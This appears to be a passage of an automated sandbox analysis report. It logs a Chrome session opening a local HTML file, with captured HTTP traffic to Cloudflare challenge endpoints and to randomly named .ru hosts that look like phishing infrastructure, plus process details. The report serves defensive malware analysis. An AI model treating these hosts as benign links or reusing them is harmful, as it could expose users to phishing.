                                                                                                            2024-12-21 23:46:57 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:46:58 UTC379INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 21 Dec 2024 23:46:58 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 7
                                                                                                            Connection: close
                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            cf-chl-out: d1jnM9DZXtLup/m6Ift4kN5/KYi3eTb9Nns=$UZpY4EvXgOkjBUcr
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc12a38ec429a-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:46:58 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                            Data Ascii: invalid


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.449785104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:47:02 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 34236
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                            CF-Chl-RetryAttempt: 0
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            CF-Challenge: aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/6079b/0x4AAAAAAA0rlvr7sW4yFuOO/auto/fbE/normal/auto/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:47:02 UTC16384OUTData Raw: 76 5f 38 66 35 62 63 30 64 39 36 61 38 62 30 63 61 61 3d 36 45 2d 62 37 65 38 69 35 76 45 38 35 54 69 38 44 52 59 52 6f 54 43 38 75 36 52 50 52 2d 62 39 31 38 7a 52 4b 46 63 38 2d 38 78 52 42 62 70 31 38 65 4a 51 55 52 62 62 70 67 53 62 52 61 2d 52 69 62 65 25 32 62 52 45 62 62 4e 63 63 52 24 42 65 4c 52 6b 71 45 62 52 31 62 38 2b 52 7a 62 43 2b 52 57 62 47 6b 2b 58 4c 52 38 46 52 44 62 54 46 52 24 54 54 36 62 52 70 70 48 43 61 52 65 56 2d 38 53 57 52 2b 48 58 33 56 62 41 70 74 5a 76 5a 65 52 52 6d 54 52 52 74 4e 52 35 57 73 4a 43 52 65 45 52 54 6c 2d 52 33 73 4a 46 57 6f 62 52 30 62 33 7a 69 31 50 6a 73 6e 6e 4a 65 31 4a 71 61 34 2d 48 52 2b 5a 45 52 41 31 35 7a 47 6d 48 52 52 49 73 56 54 6a 42 32 62 38 4c 59 24 6a 4a 6a 59 67 33 64 24 57 52 4c 62 68 36
                                                                                                            Data Ascii: v_8f5bc0d96a8b0caa=6E-b7e8i5vE85Ti8DRYRoTC8u6RPR-b918zRKFc8-8xRBbp18eJQURbbpgSbRa-Ribe%2bREbbNccR$BeLRkqEbR1b8+RzbC+RWbGk+XLR8FRDbTFR$TT6bRppHCaReV-8SWR+HX3VbAptZvZeRRmTRRtNR5WsJCReERTl-R3sJFWobR0b3zi1PjsnnJe1Jqa4-HR+ZERA15zGmHRRIsVTjB2b8LY$jJjYg3d$WRLbh6
                                                                                                            2024-12-21 23:47:02 UTC16384OUTData Raw: 52 32 75 42 63 61 38 51 31 5a 31 52 2d 52 35 65 68 52 2b 42 7a 52 38 45 47 49 7a 35 56 4a 52 67 4f 73 4f 79 39 62 57 52 70 52 65 2d 52 73 52 41 45 6d 31 52 33 63 43 62 52 61 52 42 69 54 79 6d 45 52 4a 52 38 2d 38 5a 52 77 52 70 43 65 66 52 36 52 2d 57 65 69 52 4e 45 53 2d 65 4e 52 4c 52 36 2d 6d 79 63 48 62 39 35 6d 5a 52 66 62 70 42 52 76 52 6a 62 65 30 6d 58 63 72 62 52 45 6d 39 52 59 62 6a 46 6a 78 52 32 56 4c 33 65 48 42 58 69 36 42 38 2b 38 57 62 65 42 54 48 42 59 52 5a 42 47 53 38 67 52 64 42 76 58 38 47 52 4b 42 76 69 38 4f 52 32 42 43 58 38 63 62 5a 2d 43 4e 38 45 62 31 2d 43 4a 38 52 62 4b 2d 47 65 38 46 62 32 2d 43 48 38 31 62 34 2d 76 48 38 65 62 64 2d 47 7a 38 5a 62 31 35 43 73 38 4a 62 6e 35 47 73 38 73 62 4b 35 54 30 38 66 62 63 31 54 5a 38
                                                                                                            Data Ascii: R2uBca8Q1Z1R-R5ehR+BzR8EGIz5VJRgOsOy9bWRpRe-RsRAEm1R3cCbRaRBiTymERJR8-8ZRwRpCefR6R-WeiRNES-eNRLR6-mycHb95mZRfbpBRvRjbe0mXcrbREm9RYbjFjxR2VL3eHBXi6B8+8WbeBTHBYRZBGS8gRdBvX8GRKBvi8OR2BCX8cbZ-CN8Eb1-CJ8RbK-Ge8Fb2-CH81b4-vH8ebd-Gz8Zb15Cs8Jbn5Gs8sbK5T08fbc1TZ8
                                                                                                            2024-12-21 23:47:02 UTC1468OUTData Raw: 44 43 7a 65 50 77 42 2b 45 54 42 36 65 52 33 30 74 46 6d 2b 54 6c 49 34 32 56 24 62 33 39 45 4b 79 38 54 76 68 36 51 65 61 52 4a 52 6d 61 76 6a 49 41 73 32 55 72 35 52 50 58 4e 35 52 57 52 72 42 41 2b 32 63 47 5a 63 54 79 46 72 52 76 63 38 35 38 76 78 24 4b 57 46 66 4f 4b 4c 76 43 62 38 42 52 39 34 35 63 38 78 51 4e 34 39 48 69 4a 52 54 65 77 51 6d 61 56 59 48 5a 42 52 61 52 55 35 45 74 55 61 52 32 62 41 7a 65 55 69 7a 62 47 42 65 38 72 35 50 65 36 50 6e 61 56 65 2b 56 61 2b 42 50 4e 71 73 52 65 31 78 74 31 43 65 53 6a 51 61 71 72 24 51 54 53 63 43 45 38 4a 52 64 62 65 47 34 31 33 63 70 7a 5a 33 51 58 48 37 31 61 4e 31 49 75 45 76 65 73 31 49 34 52 47 42 52 4a 52 4f 48 68 68 4c 58 70 45 43 4b 2d 64 78 49 74 35 57 4a 37 66 2d 77 63 54 61 66 46 52 46 38 4e
                                                                                                            Data Ascii: DCzePwB+ETB6eR30tFm+TlI42V$b39EKy8Tvh6QeaRJRmavjIAs2Ur5RPXN5RWRrBA+2cGZcTyFrRvc858vx$KWFfOKLvCb8BR945c8xQN49HiJRTewQmaVYHZBRaRU5EtUaR2bAzeUizbGBe8r5Pe6PnaVe+Va+BPNqsRe1xt1CeSjQaqr$QTScCE8JRdbeG413cpzZ3QXH71aN1IuEves1I4RGBRJROHhhLXpECK-dxIt5WJ7f-wcTafFRF8N
                                                                                                            2024-12-21 23:47:03 UTC286INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:47:03 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4544
                                                                                                            Connection: close
                                                                                                            cf-chl-out: 9nA9ugquVvXy6LxiCID6lOIhUJBEoIWg6spcWU7xLsZbipIFgH/9sebbnjEp7Dm5nXkRTJobOaQuIdEaCT5dXnZgiAZp2OyUR4SZ2B8IAiaEucSLsDmF27Y=$7JNnO0zFpmEVD1Oy
                                                                                                            2024-12-21 23:47:03 UTC1259INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 32 4d 46 2f 62 74 6e 35 34 2f 52 70 39 79 32 68 68 5a 5a 62 68 45 46 36 65 79 54 4c 5a 66 6a 6b 4e 38 76 4f 38 4a 36 2b 46 57 2b 68 6e 42 61 68 34 6c 6d 61 55 6d 44 6b 5a 4e 64 41 36 45 69 49 31 49 53 48 39 65 41 53 5a 38 6c 6d 57 39 7a 66 2f 50 73 64 78 4b 51 59 5a 54 36 79 66 78 4d 4e 38 6c 4f 37 43 47 75 76 36 4f 44 65 61 66 4c 42 62 51 54 68 42 73 30 6e 75 51 44 59 65 59 2f 32 6a 32 77 4a 5a 78 2f 4f 51 68 46 2f 79 6c 55 61 74 58 2b 63 36 2b 33 77 43 46 77 73 43 76 5a 73 72 37 52 2b 75 63 4f 4e 6f 6a 4a 54 6e 46 41 38 62 47 43 45 43 4a 57 36 45 34 6a 4f 44 6e 7a 74 4f 30 6b 34 65 6e 43 73 58 4c 36 6d 4a 31 62 4b 53 62 6a 5a 43 4a 79 2f 4f 6b 6a 56 64 42 61 42 7a 6b 6c 6e 64 5a 6e 2b 7a 57 46 71 4f 51 56 6b 59
                                                                                                            Data Ascii: cf-chl-out-s: 2MF/btn54/Rp9y2hhZZbhEF6eyTLZfjkN8vO8J6+FW+hnBah4lmaUmDkZNdA6EiI1ISH9eASZ8lmW9zf/PsdxKQYZT6yfxMN8lO7CGuv6ODeafLBbQThBs0nuQDYeY/2j2wJZx/OQhF/ylUatX+c6+3wCFwsCvZsr7R+ucONojJTnFA8bGCECJW6E4jODnztO0k4enCsXL6mJ1bKSbjZCJy/OkjVdBaBzklndZn+zWFqOQVkY
                                                                                                            2024-12-21 23:47:03 UTC1193INData Raw: 68 48 31 6f 58 45 71 49 68 57 53 45 55 6f 31 69 67 32 78 61 65 6c 71 5a 63 58 64 79 6b 70 2b 4f 64 71 61 65 70 6f 43 4d 66 59 57 72 62 58 75 42 70 34 4b 6f 6a 47 2b 77 6a 4c 57 6c 69 62 79 64 71 59 33 41 74 61 4f 6a 6a 72 53 69 70 4c 33 47 74 49 4f 65 6f 6f 79 59 75 6f 36 46 71 38 37 4e 6b 39 58 4c 73 4b 65 71 72 64 76 50 79 4b 76 55 31 39 75 6c 34 75 48 41 75 38 53 2b 75 4c 58 6d 77 66 48 76 72 2f 54 6e 78 65 62 67 38 76 72 69 2b 2b 6a 79 38 72 72 37 2b 76 41 45 2f 76 63 44 78 4d 66 63 33 2f 54 73 31 67 6e 33 37 75 4c 50 2f 4f 49 56 79 41 54 6e 45 76 41 4e 43 65 38 63 37 51 38 4d 43 2f 49 6a 47 50 51 6d 48 52 63 72 47 79 58 34 41 53 77 6a 44 67 58 2b 45 51 6f 4c 38 67 34 6e 4a 41 51 46 46 51 34 6f 44 78 73 54 44 51 51 38 4a 53 6b 56 4b 45 4d 43 50 69 52
                                                                                                            Data Ascii: hH1oXEqIhWSEUo1ig2xaelqZcXdykp+OdqaepoCMfYWrbXuBp4KojG+wjLWlibydqY3AtaOjjrSipL3GtIOeooyYuo6Fq87Nk9XLsKeqrdvPyKvU19ul4uHAu8S+uLXmwfHvr/Tnxebg8vri++jy8rr7+vAE/vcDxMfc3/Ts1gn37uLP/OIVyATnEvANCe8c7Q8MC/IjGPQmHRcrGyX4ASwjDgX+EQoL8g4nJAQFFQ4oDxsTDQQ8JSkVKEMCPiR
                                                                                                            2024-12-21 23:47:03 UTC1369INData Raw: 74 73 53 43 2f 7a 4c 42 77 48 4b 43 42 6f 52 7a 76 41 64 43 42 55 58 46 42 76 75 47 52 6e 6a 34 52 59 6c 46 65 72 33 48 4f 33 74 43 43 30 71 49 53 6f 31 43 41 73 46 4b 67 30 50 4f 53 30 68 4d 53 49 32 46 69 34 51 50 52 77 62 41 44 67 4b 53 53 6c 45 43 31 45 6b 54 77 38 39 4d 55 55 35 45 6c 4a 54 55 6a 74 4f 54 45 67 76 58 31 55 68 48 53 5a 6b 4a 56 30 39 57 7a 35 44 4e 6c 31 6d 59 6a 31 6e 4d 55 64 41 64 54 51 32 53 57 35 4b 64 44 52 77 55 7a 35 78 67 54 39 35 68 58 39 45 56 46 52 2f 52 30 70 6e 69 57 43 46 66 59 79 4c 61 31 36 46 65 46 4b 58 6d 59 5a 33 56 5a 6d 57 67 6d 4b 55 6e 46 65 62 6f 59 69 6c 68 4b 69 69 6f 5a 65 6a 67 58 75 68 6f 70 53 74 6b 61 2b 77 61 34 4f 34 73 70 75 76 72 6e 36 70 6c 4d 47 41 6d 37 32 2b 6d 34 47 41 79 63 46 2f 72 4d 6e 47
                                                                                                            Data Ascii: tsSC/zLBwHKCBoRzvAdCBUXFBvuGRnj4RYlFer3HO3tCC0qISo1CAsFKg0POS0hMSI2Fi4QPRwbADgKSSlEC1EkTw89MUU5ElJTUjtOTEgvX1UhHSZkJV09Wz5DNl1mYj1nMUdAdTQ2SW5KdDRwUz5xgT95hX9EVFR/R0pniWCFfYyLa16FeFKXmYZ3VZmWgmKUnFeboYilhKiioZejgXuhopStka+wa4O4spuvrn6plMGAm72+m4GAycF/rMnG
                                                                                                            2024-12-21 23:47:03 UTC1369INData Raw: 34 55 31 74 55 46 42 2f 6a 51 44 66 4c 61 44 79 49 47 34 75 51 45 38 75 6b 73 2b 69 33 6e 34 43 6f 77 45 68 4c 70 4b 75 38 42 4d 2f 4d 56 4c 43 73 51 47 67 30 53 49 50 63 2b 2b 7a 73 45 4d 6a 63 6a 51 45 59 31 4a 77 42 49 4f 45 30 4b 53 30 31 42 55 6b 4a 51 53 56 6c 54 56 54 73 57 57 46 6b 33 58 46 78 56 5a 47 4d 38 49 54 67 2b 5a 44 78 4d 4c 56 31 45 59 32 5a 6e 54 48 5a 32 63 6b 31 34 63 6d 51 32 55 6b 35 71 4f 6b 70 75 62 56 4b 41 67 6e 42 58 68 47 4a 7a 53 46 68 4a 59 30 35 38 65 6d 78 79 6a 33 47 4a 68 32 36 47 62 32 35 6e 69 4a 53 58 62 34 32 61 6d 34 4f 61 64 48 36 56 61 47 53 4a 72 59 4e 72 68 36 46 70 73 6d 61 52 63 70 43 6e 74 34 32 4c 75 33 79 75 76 35 69 7a 76 6f 7a 46 67 4d 47 5a 6b 4c 4f 34 6e 4a 57 2f 6e 61 66 41 6e 62 75 68 78 4b 58 54 72
                                                                                                            Data Ascii: 4U1tUFB/jQDfLaDyIG4uQE8uks+i3n4CowEhLpKu8BM/MVLCsQGg0SIPc++zsEMjcjQEY1JwBIOE0KS01BUkJQSVlTVTsWWFk3XFxVZGM8ITg+ZDxMLV1EY2ZnTHZ2ck14cmQ2Uk5qOkpubVKAgnBXhGJzSFhJY058emxyj3GJh26Gb25niJSXb42am4OadH6VaGSJrYNrh6FpsmaRcpCnt42Lu3yuv5izvozFgMGZkLO4nJW/nafAnbuhxKXTr
                                                                                                            2024-12-21 23:47:03 UTC613INData Raw: 76 2b 2b 67 65 38 41 44 34 35 66 66 79 46 78 55 43 42 2f 63 42 2f 51 6f 4a 4d 51 6f 79 4b 79 59 50 44 4f 34 73 43 6a 59 34 43 51 30 2f 50 78 4d 57 44 51 41 38 46 30 6b 2f 47 78 74 4b 41 78 39 50 47 41 77 50 48 46 49 54 4a 79 49 78 4a 55 55 6b 45 7a 45 51 58 7a 51 59 4f 6a 74 69 59 6a 59 36 57 46 64 6c 61 32 31 6a 59 45 55 34 63 44 38 71 53 48 4e 46 64 31 4a 72 55 31 4e 49 55 55 31 53 53 48 68 4b 68 49 56 42 55 6c 56 33 65 6d 42 69 66 48 39 75 57 57 69 47 5a 32 5a 65 62 57 64 6f 63 6f 75 56 63 35 79 4b 63 48 61 51 64 56 74 74 66 70 4f 53 59 33 43 66 65 58 78 33 6a 5a 74 2f 5a 34 56 6b 67 58 2b 6e 72 6f 61 6f 71 71 32 55 6b 4b 65 6d 6c 59 70 39 6a 33 2b 5a 6a 6f 36 64 6c 4b 61 53 68 36 44 4c 76 70 71 5a 6e 70 2b 6d 78 4b 47 76 6f 74 53 31 78 4e 75 62 6b 37
                                                                                                            Data Ascii: v++ge8AD45ffyFxUCB/cB/QoJMQoyKyYPDO4sCjY4CQ0/PxMWDQA8F0k/GxtKAx9PGAwPHFITJyIxJUUkEzEQXzQYOjtiYjY6WFdla21jYEU4cD8qSHNFd1JrU1NIUU1SSHhKhIVBUlV3emBifH9uWWiGZ2ZebWdocouVc5yKcHaQdVttfpOSY3CfeXx3jZt/Z4VkgX+nroaoqq2UkKemlYp9j3+Zjo6dlKaSh6DLvpqZnp+mxKGvotS1xNubk7


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.449786104.18.95.414435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:47:04 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/2144205977:1734822664:XKpvCZGkBd0ktNxiYV1b9wSYFyh5ygqpTdMQDiGBsGo/8f5bc0d96a8b0caa/aBNtVQx31oocAJjdhBaOAt7LmiFGkA8t6ldYzHWiVng-1734824805-1.1.1.1-EKqX6.aLBQLg80.TuzSr5p4_QiC2m1xIs3JPNlgA6I7950_c5ao3YSbrBzt3ilxZ HTTP/1.1
                                                                                                            Host: challenges.cloudflare.com
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:47:05 UTC379INHTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 21 Dec 2024 23:47:05 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 7
                                                                                                            Connection: close
                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                            cf-chl-out: a1+9r2hDQ54jchE0vOgmACn4xQt/Vzt3YtA=$5HpocD3h80iQQrZ1
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc154eba919ae-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-12-21 23:47:05 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                            Data Ascii: invalid


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.449788172.67.181.2204435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:47:06 UTC676OUTGET /13969733940135742186QBaVJJEPNDNHBZEJMKLGFKSODYUFRAXZJQPSJLVGPSOLEMMDQJNPZMCD HTTP/1.1
                                                                                                            Host: 2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru
                                                                                                            Connection: keep-alive
                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                            Accept: */*
                                                                                                            Origin: https://tf6.jqugbctcds.ru
                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Referer: https://tf6.jqugbctcds.ru/
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:47:07 UTC900INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:47:07 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aB3eJ5IjeOcvr69etJ%2F%2FYV%2FWHlIxa4K%2BQaGloOYRPqlXbybF7gZRL9g2XQghN5UfKhRsHbvig4sDzFxRZgQkjbWbjkPEzPqsEf2tvcteyxzRvGJVckBupAF8BZEjbLUZWcvLl7xIl%2Bg6TuAHzsuhp6KDczI0D34A8pGMQfds%2B1quCtFkbiqHFUOLGjpsuq9yyYhzF5fW9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc15ed95e42b1-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1699&rtt_var=652&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1254&delivery_rate=1660978&cwnd=211&unsent_bytes=0&cid=56d2dd3e637d9913&ts=933&x=0"
                                                                                                            2024-12-21 23:47:07 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                            Data Ascii: 11
                                                                                                            2024-12-21 23:47:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.449792172.67.181.2204435768C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-21 23:47:09 UTC468OUTGET /13969733940135742186QBaVJJEPNDNHBZEJMKLGFKSODYUFRAXZJQPSJLVGPSOLEMMDQJNPZMCD HTTP/1.1
                                                                                                            Host: 2q6ftlgj9l6xf3qsi9ntfaenwreu23cn79a8asqvv37oclyy4zyrfn.uyofiykrxf.ru
                                                                                                            Connection: keep-alive
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                            Accept: */*
                                                                                                            Sec-Fetch-Site: none
                                                                                                            Sec-Fetch-Mode: cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            2024-12-21 23:47:10 UTC895INHTTP/1.1 200 OK
                                                                                                            Date: Sat, 21 Dec 2024 23:47:10 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fYkLY4rgMEOdHre9V9raX%2BcRa0xZGLun9jJvhZemcs8q843A7qDaUnX%2FvWAxq9etggrJk54gifGLryj3CTujDiV%2B3SIcOdEVgCOSFa1D49gCXtcJtRKE9e2wmJEoTyz3oAMPUijJDMDJaKjtLO%2BBZEtTFAnxtQ3jyqtFMnWrpR20bg8JQcft1K0PBhPfVKOEsCv9AK3yMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f5bc174de820c74-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1512&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1046&delivery_rate=1886304&cwnd=84&unsent_bytes=0&cid=669825813dc01bfc&ts=872&x=0"
                                                                                                            2024-12-21 23:47:10 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                            Data Ascii: 11
                                                                                                            2024-12-21 23:47:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:18:46:28
                                                                                                            Start date:21/12/2024
                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\7394231845.html"
                                                                                                            Imagebase:0x7ff76e190000
                                                                                                            File size:3'242'272 bytes
                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:2
                                                                                                            Start time:18:46:30
                                                                                                            Start date:21/12/2024
                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2220,i,2674854293145745611,13744225234503133344,262144 /prefetch:8
                                                                                                            Imagebase:0x7ff76e190000
                                                                                                            File size:3'242'272 bytes
                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            No disassembly